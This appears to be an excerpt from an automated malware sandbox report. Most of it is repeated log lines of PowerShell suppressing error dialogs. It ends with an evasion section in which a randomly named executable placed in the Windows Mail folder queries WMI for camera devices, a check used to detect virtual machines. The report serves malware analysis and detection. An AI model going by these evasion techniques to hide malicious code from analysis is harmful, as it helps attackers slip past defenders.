Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
